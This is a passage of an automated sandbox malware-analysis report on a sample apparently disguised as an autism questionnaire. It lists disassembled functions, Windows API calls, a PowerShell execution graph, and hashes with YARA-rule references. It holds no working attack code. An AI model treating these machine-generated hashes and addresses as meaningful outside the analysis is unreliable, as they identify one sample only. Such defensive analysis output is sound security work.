                                                                                              • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                                                              • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                                              • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                                                • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                                                                • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                                                              Strings
                                                                                              • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                              • String ID: Detected restart. Removing temporary directory.
                                                                                              • API String ID: 1717587489-3199836293
                                                                                              • Opcode ID: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
                                                                                              • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                                                              • Opcode Fuzzy Hash: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
                                                                                              • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C86E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                                • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                              • API String ID: 1883125708-2676053874
                                                                                              • Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                                                              • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                                                              • Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                                                              • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                              • API String ID: 1883125708-2866557904
                                                                                              • Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                                                              • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                                                              • Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                                                              • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                              • API String ID: 1646373207-1816364905
                                                                                              • Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                                                              • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                                                              • Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
                                                                                              • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                              • API String ID: 1646373207-2498399450
                                                                                              • Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                                                              • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                                                              • Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
                                                                                              • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                              • API String ID: 1646373207-260599015
                                                                                              • Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                                                              • Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
                                                                                              • Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
                                                                                              • Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                              • API String ID: 1646373207-834958232
                                                                                              • Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                                                              • Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
                                                                                              • Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
                                                                                              • Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: powershell.exe PID: 5516 Parent PID: 2880 powershell.exeCOMMON

                                                                                              Execution Graph

                                                                                              Execution Coverage:6.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:105
                                                                                              Total number of Limit Nodes:2

                                                                                              Graph

                                                                                              execution_graph 41942 73aa858 41944 73aa896 41942->41944 41943 73aa8e3 41944->41943 41945 1024260 GetFileAttributesW 41944->41945 41946 1024270 GetFileAttributesW 41944->41946 41945->41943 41946->41943 41813 1022188 41814 102219a 41813->41814 41818 1024260 41814->41818 41823 1024270 41814->41823 41815 10221c9 41819 102427a 41818->41819 41820 102429f 41819->41820 41828 1024328 41819->41828 41833 1024319 41819->41833 41820->41815 41824 102427a 41823->41824 41825 102429f 41824->41825 41826 1024328 GetFileAttributesW 41824->41826 41827 1024319 GetFileAttributesW 41824->41827 41825->41815 41826->41825 41827->41825 41829 102433b 41828->41829 41838 1024390 41829->41838 41844 10243a0 41829->41844 41830 1024359 41830->41820 41834 102433b 41833->41834 41836 1024390 GetFileAttributesW 41834->41836 41837 10243a0 GetFileAttributesW 41834->41837 41835 1024359 41835->41820 41836->41835 41837->41835 41840 10243b5 41838->41840 41839 10244bb 41839->41830 41840->41839 41850 10250d1 41840->41850 41841 102447a 41841->41839 41843 10250d1 GetFileAttributesW 41841->41843 41843->41839 41846 10243b5 41844->41846 41845 10244bb 41845->41830 41846->41845 41849 10250d1 GetFileAttributesW 41846->41849 41847 102447a 41847->41845 41848 10250d1 GetFileAttributesW 41847->41848 41848->41845 41849->41847 41856 10250d1 GetFileAttributesW 41850->41856 41857 1025130 41850->41857 41851 10250fa 41852 1025100 41851->41852 41862 1023fec 41851->41862 41852->41841 41856->41851 41858 1025148 41857->41858 41859 102515d 41858->41859 41860 1023fec GetFileAttributesW 41858->41860 41859->41851 41861 102518e 41860->41861 41861->41851 41863 1025658 GetFileAttributesW 41862->41863 41865 102518e 41863->41865 41865->41841 41866 73b2b30 41867 73b2b44 41866->41867 41870 73b33fa 41867->41870 41877 73b3a18 41870->41877 41882 73b3b46 41870->41882 41887 73b3ad6 41870->41887 41892 73b3abc 41870->41892 41897 73b3a08 41870->41897 41878 73b3a33 41877->41878 41879 73b3b09 41878->41879 41902 73b45e8 41878->41902 41907 73b45d8 41878->41907 41883 73b3b4c 41882->41883 41924 73b5220 41883->41924 41929 73b5210 41883->41929 41884 73b2b4d 41888 73b3aec 41887->41888 41889 73b3b09 41888->41889 41890 73b45e8 RtlDecodePointer 41888->41890 41891 73b45d8 RtlDecodePointer 41888->41891 41890->41889 41891->41889 41893 73b3a6f 41892->41893 41894 73b3b09 41893->41894 41895 73b45e8 RtlDecodePointer 41893->41895 41896 73b45d8 RtlDecodePointer 41893->41896 41895->41894 41896->41894 41898 73b3a0e 41897->41898 41899 73b3b09 41898->41899 41900 73b45e8 RtlDecodePointer 41898->41900 41901 73b45d8 RtlDecodePointer 41898->41901 41900->41899 41901->41899 41903 73b45f7 41902->41903 41912 73b4ab2 41903->41912 41916 73b4ac0 41903->41916 41904 73b4615 41904->41879 41908 73b45e8 41907->41908 41910 73b4ab2 RtlDecodePointer 41908->41910 41911 73b4ac0 RtlDecodePointer 41908->41911 41909 73b4615 41909->41879 41910->41909 41911->41909 41913 73b4abd 41912->41913 41914 73b4afa 41913->41914 41920 73b46b0 41913->41920 41914->41904 41918 73b4ac9 41916->41918 41917 73b4afa 41917->41904 41918->41917 41919 73b46b0 RtlDecodePointer 41918->41919 41919->41917 41921 73b5088 RtlDecodePointer 41920->41921 41923 73b50f6 41921->41923 41923->41914 41925 73b522f 41924->41925 41934 73b5269 41925->41934 41938 73b5278 41925->41938 41926 73b524d 41926->41884 41930 73b5220 41929->41930 41932 73b5269 RtlDecodePointer 41930->41932 41933 73b5278 RtlDecodePointer 41930->41933 41931 73b524d 41931->41884 41932->41931 41933->41931 41937 73b5278 41934->41937 41935 73b52ab 41935->41926 41936 73b46b0 RtlDecodePointer 41936->41935 41937->41935 41937->41936 41941 73b528d 41938->41941 41939 73b52ab 41939->41926 41940 73b46b0 RtlDecodePointer 41940->41939 41941->41939 41941->41940

                                                                                              Executed Functions

                                                                                              Function 073A2940, Relevance: 9.6, Strings: 7, Instructions: 834COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 174 73a2940-73a2972 176 73a2978-73a29ac 174->176 177 73a2cf1-73a2d50 174->177 181 73a29b3-73a29f8 176->181 399 73a2d53 call 73a3053 177->399 400 73a2d53 call 73a2930 177->400 401 73a2d53 call 73a2940 177->401 402 73a2d53 call 73a30e7 177->402 198 73a2aaa-73a2aae 181->198 199 73a29fe-73a2a05 181->199 187 73a2d59-73a2d76 190 73a2d7c-73a2d85 187->190 191 73a32a1-73a32a8 187->191 192 73a2d8b-73a2da9 190->192 193 73a3454-73a348a 190->193 208 73a2dab-73a2dbb 192->208 209 73a2dc1-73a2dd0 192->209 213 73a348f-73a34a1 193->213 200 73a2bfe-73a2c02 198->200 201 73a2ab4-73a2abb 198->201 204 73a2a07-73a2a1c 199->204 205 73a2a24-73a2a63 199->205 210 73a2c08-73a2c0f 200->210 211 73a2cc6-73a2ccd 200->211 206 73a2ada-73a2b2b 201->206 207 73a2abd-73a2ad2 201->207 204->205 218 73a2a92-73a2aa8 205->218 219 73a2a65-73a2a90 205->219 229 73a2bdd-73a2bfc 206->229 230 73a2b31-73a2b81 206->230 207->206 208->209 225 73a328f-73a329b 208->225 209->225 227 73a2dd6-73a2de2 209->227 214 73a2c2e-73a2c7f 210->214 215 73a2c11-73a2c26 210->215 236 73a34a3-73a34af 213->236 237 73a34b1-73a3584 213->237 232 73a2cae-73a2ce3 214->232 233 73a2c81-73a2cac 214->233 215->214 218->198 219->218 225->190 225->191 248 73a2de8-73a2df9 227->248 249 73a2de4-73a2de6 227->249 229->200 251 73a2b83-73a2bae 230->251 252 73a2bb0-73a2bd7 230->252 232->200 233->232 236->237 255 73a2dff-73a2e01 248->255 249->255 251->252 252->229 252->230 258 73a30eb-73a30f7 255->258 259 73a2e07-73a2e12 255->259 269 73a30f9-73a30fb 258->269 270 73a30fd-73a310e 258->270 259->258 267 73a2e18-73a2e32 259->267 267->225 279 73a2e38-73a2e45 267->279 272 73a3114-73a3116 269->272 270->272 272->225 274 73a311c-73a3127 272->274 274->225 278 73a312d-73a3147 274->278 278->225 287 73a314d-73a3152 278->287 282 73a2e56 279->282 283 73a2e47-73a2e54 279->283 284 73a2e5b-73a2e5d 282->284 283->284 284->225 286 73a2e63-73a2e69 284->286 288 73a2e6b-73a2e7c 286->288 289 73a2e82-73a2ed0 286->289 290 73a3160 287->290 291 73a3154-73a315e 287->291 288->289 298 73a32ab-73a32ea 288->298 313 73a2f02-73a2f25 289->313 314 73a2ed2-73a2efb 289->314 292 73a3165-73a3167 290->292 291->292 292->225 295 73a316d-73a3173 292->295 296 73a318b-73a31c9 295->296 297 73a3175-73a3185 295->297 325 73a31cb-73a31ce 296->325 326 73a31d6-73a31dc 296->326 297->296 303 73a337b-73a33c0 297->303 318 73a32ec-73a32f6 298->318 319 73a3301-73a3374 298->319 330 73a33c2-73a33cc 303->330 331 73a33d7-73a344d 303->331 334 73a2f2b-73a2f31 313->334 335 73a3067-73a3090 313->335 314->313 318->319 319->303 325->326 327 73a320e-73a3249 326->327 328 73a31de-73a3207 326->328 327->225 357 73a324b-73a3284 327->357 328->327 330->331 331->193 340 73a2f63-73a2fa0 334->340 341 73a2f33-73a2f5c 334->341 335->225 351 73a3096-73a30da 335->351 373 73a302c-73a3045 340->373 374 73a2fa6-73a3005 340->374 341->340 351->225 357->225 382 73a3050 373->382 383 73a3047 373->383 395 73a3012-73a3026 374->395 396 73a3007-73a300a 374->396 382->335 383->382 395->373 395->374 396->395 399->187 400->187 401->187 402->187
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HJx$HJx$HJx$HJx$HJx$HJx$HJx
                                                                                              • API String ID: 0-291125046
                                                                                              • Opcode ID: cf85f9e77cd032437fd597c214c683b9f7ffa60d5457493dc3b5bb2a56e0075a
                                                                                              • Instruction ID: 289ebe4a17b4edf2ce9a1a9c6d5dd3bad14ca4642ee78809dee75a4e05dc674b
                                                                                              • Opcode Fuzzy Hash: cf85f9e77cd032437fd597c214c683b9f7ffa60d5457493dc3b5bb2a56e0075a
                                                                                              • Instruction Fuzzy Hash: C962B174A002099FDB14EF68C485AAEB7F2FF88304F548569E409AB364DF74ED46CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AA858, Relevance: 13.0, Strings: 10, Instructions: 535COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
